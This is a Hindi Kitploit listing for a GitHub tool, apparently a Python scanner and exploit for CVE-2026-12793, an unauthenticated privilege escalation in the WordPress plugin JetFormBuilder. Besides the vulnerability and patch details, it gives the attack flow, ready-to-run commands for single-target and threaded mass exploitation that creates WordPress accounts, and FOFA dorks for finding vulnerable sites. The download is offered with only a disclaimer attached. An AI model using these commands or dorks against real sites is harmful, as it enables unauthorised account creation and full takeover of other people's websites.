Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

फ़ीडसंपर्कगोपनीयता© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-12793 — Python PoC स्कैनर और CVE-2026-12793 के लिए एक्सप्लॉइट, जो JetFormBuilder <=3.6.2 में एक अनधिकृत विशेषाधिकार वृद्धि है जो WordPress एडमिन अकाउंट बनाता है। | Kitploit
उपकरण/GitHubGitHub/murrez/cve-2026-12793
विशेषाधिकार वृद्धिटोहीभेद्यता स्कैनरभेद्यता विश्लेषणशोषणस्क्रिप्टिंग और स्वचालनवेब एप्लिकेशन शोषणजानकारी एकत्र करनावेब सुरक्षापेनिट्रेशन टेस्टिंग
GitHub
511920 दिन पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
murrez/cve-2026-12793

CVE-2026-12793

Python PoC स्कैनर और CVE-2026-12793 के लिए एक्सप्लॉइट, जो JetFormBuilder <=3.6.2 में एक अनधिकृत विशेषाधिकार वृद्धि है जो WordPress एडमिन अकाउंट बनाता है।

रिपॉजिटरी देखें

CVE-2026-12793 — JetFormBuilder अनधिकृत विशेषाधिकार वृद्धि

WordPress प्लगइन JetFormBuilder — Dynamic Blocks Form Builder (Crocoblock) में CVE-2026-12793 के लिए प्रूफ-ऑफ-कॉन्सेप्ट स्कैनर और एक्सप्लॉइट।

CVECVE-2026-12793
प्लगइनjetformbuilder
प्रभावित≤ 3.6.2
में ठीक किया गया3.6.2.1+
CVSS9.8 Critical
प्रमाणीकरणअनधिकृत
CWECWE-269 — अनुचित विशेषाधिकार प्रबंधन
शोधकर्ताdaroo (Wordfence)

भेद्यता

प्लगइन यह सत्यापित नहीं करता कि _jet_engine_booking_form_id किसी प्रकाशित jet-form-builder कस्टम पोस्ट प्रकार को संदर्भित करता है, इससे पहले कि वह संदर्भित पोस्ट की ब्लॉक सामग्री को फॉर्म स्कीमा के रूप में लोड करे और पोस्ट-सबमिट क्रियाएँ निष्पादित करे।

एक अनधिकृत हमलावर Register User क्रिया (wp_insert_user) को ट्रिगर करने और एक नया WordPress खाता बनाने के लिए एक तैयार किया गया AJAX अनुरोध सबमिट कर सकता है। यदि लक्ष्य फॉर्म को उच्च भूमिका (जैसे administrator) के साथ गलत कॉन्फ़िगर किया गया है, तो यह पूर्ण साइट अधिग्रहण की ओर ले जाता है।

हमला प्रवाह

1. Detect JetFormBuilder + version ≤ 3.6.2 (readme.txt)
2. Discover form ID from public pages (data-form-id, /register/, etc.)
3. POST to referer page with ?jet_form_builder_submit=submit&method=ajax
4. Register User action runs → new WP user created

पैच (3.6.2.1)

  • Block_Helper::is_valid_form_post() — केवल प्रकाशित jet-form-builder CPT स्वीकार किया जाता है
  • Form_Handler::set_form_id() अमान्य फॉर्म ID को अस्वीकार करता है
  • SSR सत्यापन सख्तीकरण (wp_insert_user / wp_update_user को कॉलबैक के रूप में अवरुद्ध किया गया)

आवश्यकताएँ

  • Python 3.8+
  • requests
pip install requests urllib3

उपयोग

एकल लक्ष्य — जाँच

python poc.py -u https://target.example --mode check

सामूहिक स्कैन

python poc.py --list domains.txt --mode check --threads 30 --quiet

इनपुट प्रारूप: प्रति पंक्ति एक डोमेन/URL, FOFA CSV (host,domain), या पिछले रन से candidates.jsonl।

एक्सप्लॉइट (एकल लक्ष्य)

python poc.py -u https://target.example --mode exploit \
  --form-id 1858 \
  --page-url /register/ \
  --fields login=cadastro_nome,email=cadastro_mail,password=cadastro_senha \
  --username myuser \
  --email [email protected] \
  --password 'SecurePass123!' \
  --verify

उम्मीदवारों से सामूहिक एक्सप्लॉइट

python poc.py --list candidates.jsonl --mode exploit --threads 10 --verify

विकल्प

फ़्लैगविवरण
-u, --urlएकल लक्ष्य URL
--listलक्ष्य सूची फ़ाइल
--modecheck (डिफ़ॉल्ट) या exploit
--form-idज्ञात JetFormBuilder फॉर्म पोस्ट ID
--page-urlफॉर्म को एम्बेड करने वाला पृष्ठ (referer), जैसे /register/
--fieldsफ़ील्ड मैप: login=x,email=y,password=z
--pathsफॉर्म के लिए क्रॉल करने के लिए अतिरिक्त पथ
--username / --email / --passwordएक्सप्लॉइट के लिए क्रेडेंशियल (छोड़े जाने पर यादृच्छिक)
--verifyसबमिट के बाद wp-login.php के माध्यम से खाता सत्यापित करें
-j, --threadsवर्कर थ्रेड्स (डिफ़ॉल्ट: 20)
--timeoutHTTP टाइमआउट सेकंड में (डिफ़ॉल्ट: 20)
--proxyHTTP(S) प्रॉक्सी URL
--outputपूर्ण JSONL लॉग (डिफ़ॉल्ट: cve_2026_12793_results.jsonl)
--vuln-listहिट सूची (डिफ़ॉल्ट: hits.txt)
--candidates-listउम्मीदवार JSONL (डिफ़ॉल्ट: candidates.jsonl)
-q, --quietकेवल प्रगति आउटपुट

आउटपुट फ़ाइलें

फ़ाइलसामग्री
hits.txtभेद्य / शोषित लक्ष्य URL
candidates.jsonlपहुँच योग्य Register User प्रोब वाले लक्ष्य (form_id, page_url, fields)
cve_2026_12793_results.jsonlपूर्ण प्रति-लक्ष्य JSON परिणाम

उदाहरण उम्मीदवार प्रविष्टि

{
  "target": "https://target.example",
  "version": "3.3.3",
  "form_id": 1858,
  "page_url": "https://target.example/register/",
  "fields": {
    "login": "user_login",
    "email": "user_email",
    "password": "user_pass"
  }
}

स्वतः-पहचाने गए फ़ील्ड नाम अनुमानित हैं। एक्सप्लॉइट से पहले हमेशा सत्यापित करें और --fields के साथ ओवरराइड करें।

डिटेक्शन / FOFA dorks

body="/wp-content/plugins/jetformbuilder/"
body="jet-form-builder" && body="wp-content"
header="/wp-content/plugins/jetformbuilder/"
title="WordPress" && body="data-form-id"

संस्करण जाँच:

/wp-content/plugins/jetformbuilder/readme.txt

Stable tag: ≤ 3.6.2 देखें।

संदर्भ

  • NVD — CVE-2026-12793
  • Wordfence Threat Intel
  • Patchstack
  • WordPress.org changeset
  • GitHub fix commit

अस्वीकरण

यह टूल केवल अधिकृत सुरक्षा परीक्षण और शैक्षिक उद्देश्यों के लिए प्रदान किया गया है। कंप्यूटर सिस्टम तक अनधिकृत पहुँच अवैध है। लेखक दुरुपयोग के लिए कोई दायित्व स्वीकार नहीं करते।

लाइसेंस

MIT

टूल डाउनलोड करें